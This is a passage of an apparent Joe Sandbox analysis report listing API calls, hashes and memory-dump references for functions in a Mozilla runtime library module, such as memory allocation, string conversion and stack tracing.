                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                  • API String ID: 145871493-3641475894
                                                                  • Opcode ID: 78e5aae2db539a891e954fe66c3c642936a6cf58a099ea2aa54847b000227f17
                                                                  • Instruction ID: 7e6aa7826bc97aa8ae9666e2f4514e75787f86c030e58bab1c4690a3f0bd1a54
                                                                  • Opcode Fuzzy Hash: 78e5aae2db539a891e954fe66c3c642936a6cf58a099ea2aa54847b000227f17
                                                                  • Instruction Fuzzy Hash: 63E09271609702ABEB007FA6C848B06BEF8EB8761CF20D425A905D1601EBBCC259CF51
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C927592), ref: 6C927608
                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C927627
                                                                  • FreeLibrary.KERNEL32(?,6C927592), ref: 6C92763C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                  • API String ID: 145871493-1050664331
                                                                  • Opcode ID: 8e6cc5f4c73cc40a02932644098c59f23ec0fd2fc84c8944de7e754721a610a8
                                                                  • Instruction ID: 3d259ac6de52891bd5605501b1a73e5b9545903ca184d3b20d6d10c6ca443565
                                                                  • Opcode Fuzzy Hash: 8e6cc5f4c73cc40a02932644098c59f23ec0fd2fc84c8944de7e754721a610a8
                                                                  • Instruction Fuzzy Hash: D4E0B6B461E702ABDF007FA6C818B0A7EB9E79A75DF21D115E905D1701E7B8C008CF55
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C92BE49), ref: 6C92BEC4
                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C92BEDE
                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C92BE49), ref: 6C92BF38
                                                                  • RtlReAllocateHeap.NTDLL ref: 6C92BF83
                                                                  • RtlFreeHeap.NTDLL(6C92BE49,00000000), ref: 6C92BFA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                  • String ID:
                                                                  • API String ID: 2764315370-0
                                                                  • Opcode ID: 16ed1de573612f04235122e6c39b7c456ba00f0bb3f24712f41ee552541638ea
                                                                  • Instruction ID: 5c9aea4f251e03819864b0c5fe9553aca21b15df15032f6765cdd1d079087045
                                                                  • Opcode Fuzzy Hash: 16ed1de573612f04235122e6c39b7c456ba00f0bb3f24712f41ee552541638ea
                                                                  • Instruction Fuzzy Hash: D151D471A102118FE720DF69CC80BAAB7F6FF98314F284639D55697B58D734F9168B80
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?,6C93D734), ref: 6C918E6E
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?,6C93D734), ref: 6C918EBF
                                                                  • free.MOZGLUE(?,?,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?), ref: 6C918F24
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?,6C93D734), ref: 6C918F46
                                                                  • free.MOZGLUE(?,?,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?), ref: 6C918F7A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C90B58D,?,?,?,?,?,?,?,6C93D734,?,?,?), ref: 6C918F8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: ef8881fdb9395e28d73b79d6a07eb1481864aa184ceb90fe08dc56b27658c84e
                                                                  • Instruction ID: 00390dfab64394f52602f5676bd2a45bf3b9d133c0f0aa54c93a70f92ab68713
                                                                  • Opcode Fuzzy Hash: ef8881fdb9395e28d73b79d6a07eb1481864aa184ceb90fe08dc56b27658c84e
                                                                  • Instruction Fuzzy Hash: D851F7B1A0421A8FEB18CF54D88176E73B6FF45308F26052AD916ABB40E731F915CBD5
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D60F4
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D6180
                                                                  • free.MOZGLUE(?,?,?,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8D6211
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D6229
                                                                  • free.MOZGLUE(?,?,?,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8D625E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8D6271
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 2d0ccf24f352353525610d48dc730ab45d1cdede84c0a567f5ad133944af42ba
                                                                  • Instruction ID: be5a7881a551c0885ea2e66392f9b94aa234b36a88553701a46d95f8c6a80acc
                                                                  • Opcode Fuzzy Hash: 2d0ccf24f352353525610d48dc730ab45d1cdede84c0a567f5ad133944af42ba
                                                                  • Instruction Fuzzy Hash: CC516AB1A0420A8FEB24CFA8D9807AEB7B5AF45308F224D3DC516D7711E731B958CB61
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C91284D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C91289A
                                                                  • free.MOZGLUE(?,?,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C9128F1
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C912910
                                                                  • free.MOZGLUE(00000001,?,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C91293C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C912620,?,?,?,6C9060AA,6C905FCB,6C9079A3), ref: 6C91294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 8b78909e40dfda01b1fdd86b884d9ec3b4387eeeeb22403e6fda666fc4ab82d3
                                                                  • Instruction ID: 9f024ccfc5ebfccdae861ab9785695ec46c4487287ececeffdfafa2501998df3
                                                                  • Opcode Fuzzy Hash: 8b78909e40dfda01b1fdd86b884d9ec3b4387eeeeb22403e6fda666fc4ab82d3
                                                                  • Instruction Fuzzy Hash: F741E2B1A0860A8FEB14DF6CD98536A73FAEF46308F240979D556EBB40E731E904CB51
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E784), ref: 6C8CCFF6
                                                                  • LeaveCriticalSection.KERNEL32(6C94E784), ref: 6C8CD026
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C8CD06C
                                                                  • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C8CD139
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 1090480015-2608361144
                                                                  • Opcode ID: f73d68c68d30a14f386555068e78ea8a8dde77342186250dc122d86039c3ceda
                                                                  • Instruction ID: 85ffc5db7704ca216d62706abda416b3005ed1a2f0051bd3ce4efa3dec84094e
                                                                  • Opcode Fuzzy Hash: f73d68c68d30a14f386555068e78ea8a8dde77342186250dc122d86039c3ceda
                                                                  • Instruction Fuzzy Hash: 8041F971B847164FDB14EF7C8D9036AB6B0EB49B28F25463AE918E7784D7B19C018BC1
                                                                  APIs
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C8C4E5A
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C8C4E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8C4EE9
                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8C4F02
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C8C4F1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 713647276-0
                                                                  • Opcode ID: b6d5dd3ab1c93cd932acf12de4205fab25122a6ba27feac0b3fbbb40ff6a1029
                                                                  • Instruction ID: 2d3ae204c3e02b8419d683bf587a61c5b8154c10232a3c9d0b62c6a257b6b33e
                                                                  • Opcode Fuzzy Hash: b6d5dd3ab1c93cd932acf12de4205fab25122a6ba27feac0b3fbbb40ff6a1029
                                                                  • Instruction Fuzzy Hash: 5141D0716087059FC721CF68C48096BBBE4BFC9354F108E2DF46697A41D730E998CB92
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C8D152B,?,?,?,?,6C8D1248,?), ref: 6C8D159C
                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C8D152B,?,?,?,?,6C8D1248,?), ref: 6C8D15BC
                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C8D152B,?,?,?,?,6C8D1248,?), ref: 6C8D15E7
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C8D152B,?,?,?,?,6C8D1248,?), ref: 6C8D1606
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C8D152B,?,?,?,?,6C8D1248,?), ref: 6C8D1637
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                  • String ID:
                                                                  • API String ID: 733145618-0
                                                                  • Opcode ID: a39bd719b1970a660401ebd8b719f0fc0146975b6454facf08135f0ddbf3f185
                                                                  • Instruction ID: 4d13e1ece62026079687716f8067ebd9e27d02136bafaf520ea18e3c107ed0fa
                                                                  • Opcode Fuzzy Hash: a39bd719b1970a660401ebd8b719f0fc0146975b6454facf08135f0ddbf3f185
                                                                  • Instruction Fuzzy Hash: 4431D871A001148BC7249E78D95046E77B5AF953747260F6DE427DBBD4EB30F9048791
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C93E330,?,6C8EC059), ref: 6C92AD9D
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C93E330,?,6C8EC059), ref: 6C92ADAC
                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C93E330,?,6C8EC059), ref: 6C92AE01
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C93E330,?,6C8EC059), ref: 6C92AE1D
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C93E330,?,6C8EC059), ref: 6C92AE3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3161513745-0
                                                                  • Opcode ID: 60f2cf41969f8c0b83a185c12460f31058f0b935177f062f4df75f69c8ca2e56
                                                                  • Instruction ID: 2af58aa61c821d15037270f191d8f4f0989c24a147e4ad35d4365bd49b79fa52
                                                                  • Opcode Fuzzy Hash: 60f2cf41969f8c0b83a185c12460f31058f0b935177f062f4df75f69c8ca2e56
                                                                  • Instruction Fuzzy Hash: EC3154B29007159FD710DF798D44AABB7F8EF59614F158829E85AD7700EB34D805C7A0
                                                                  APIs
                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C93DCA0,?,?,?,6C8FE8B5,00000000), ref: 6C925F1F
                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8FE8B5,00000000), ref: 6C925F4B
                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C8FE8B5,00000000), ref: 6C925F7B
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C8FE8B5,00000000), ref: 6C925F9F
                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C8FE8B5,00000000), ref: 6C925FD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                  • String ID:
                                                                  • API String ID: 1389714915-0
                                                                  • Opcode ID: ec0e0eeb0c56d927a7bfdc4435c7d27e362db30ec51c04afccf4d5f94dea7ad0
                                                                  • Instruction ID: b43eaeefe671c33aada8c03342206fe0deed788a515389df78b873360df5e314
                                                                  • Opcode Fuzzy Hash: ec0e0eeb0c56d927a7bfdc4435c7d27e362db30ec51c04afccf4d5f94dea7ad0
                                                                  • Instruction Fuzzy Hash: 71314E34314A008FD720CF29C898F6AB7F9FF89319BA48558E59687B99C735EC51CB80
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C8CB532
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C8CB55B
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8CB56B
                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C8CB57E
                                                                  • free.MOZGLUE(00000000), ref: 6C8CB58F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                  • String ID:
                                                                  • API String ID: 4244350000-0
                                                                  • Opcode ID: d1a96b6fdfe8ff53c8f26fa320170b2fa47a3ac15898dabaa4afbd94d3f0c053
                                                                  • Instruction ID: b2dde009d3ce1057996ba6c6e16db11f184dfaea57647dd8acc0e5c86ac17989
                                                                  • Opcode Fuzzy Hash: d1a96b6fdfe8ff53c8f26fa320170b2fa47a3ac15898dabaa4afbd94d3f0c053
                                                                  • Instruction Fuzzy Hash: 6B210571B006059BDB109F68CD40BBEBBB9FF86318F284529E818DB341E736D911CBA1
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C8CB7CF
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C8CB808
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C8CB82C
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8CB840
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8CB849
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1977084945-0
                                                                  • Opcode ID: 7d486a15f8220d5e335880d963b53ed1da4e4b0fc0f3ba7ba7cb9b4c936ae926
                                                                  • Instruction ID: ef0f313d8965de2ee82ce8c94c3e25c527e046a445fa1f32a19deaf013d63bc5
                                                                  • Opcode Fuzzy Hash: 7d486a15f8220d5e335880d963b53ed1da4e4b0fc0f3ba7ba7cb9b4c936ae926
                                                                  • Instruction Fuzzy Hash: 9C217AB0E002199FDF10DFA8C9845BEBBB4EF49318F148529EC15A7300E731A948CBA1
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C926E78
                                                                    • Part of subcall function 6C926A10: InitializeCriticalSection.KERNEL32(6C94F618), ref: 6C926A68
                                                                    • Part of subcall function 6C926A10: GetCurrentProcess.KERNEL32 ref: 6C926A7D
                                                                    • Part of subcall function 6C926A10: GetCurrentProcess.KERNEL32 ref: 6C926AA1
                                                                    • Part of subcall function 6C926A10: EnterCriticalSection.KERNEL32(6C94F618), ref: 6C926AAE
                                                                    • Part of subcall function 6C926A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C926AE1
                                                                    • Part of subcall function 6C926A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C926B15
                                                                    • Part of subcall function 6C926A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C926B65
                                                                    • Part of subcall function 6C926A10: LeaveCriticalSection.KERNEL32(6C94F618,?,?), ref: 6C926B83
                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C926EC1
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C926EE1
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C926EED
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C926EFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                  • String ID:
                                                                  • API String ID: 4058739482-0
                                                                  • Opcode ID: 2ccc8a3a277a3dea6f2c9489f734d655c700a0e994a6d65725435984d36a8661
                                                                  • Instruction ID: e39c1824ad63c8d5cf6fbe2571358e9f0330e7eae6c8b9bcea2e4e1c24ab4f55
                                                                  • Opcode Fuzzy Hash: 2ccc8a3a277a3dea6f2c9489f734d655c700a0e994a6d65725435984d36a8661
                                                                  • Instruction Fuzzy Hash: 3821B071A0821A8FCF10DF69D8856DE77F8EF88308F048079E84D97240EB749A58CF92
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C9276F2
                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C927705
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C927717
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C92778F,00000000,00000000,00000000,00000000), ref: 6C927731
                                                                  • free.MOZGLUE(00000000), ref: 6C927760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
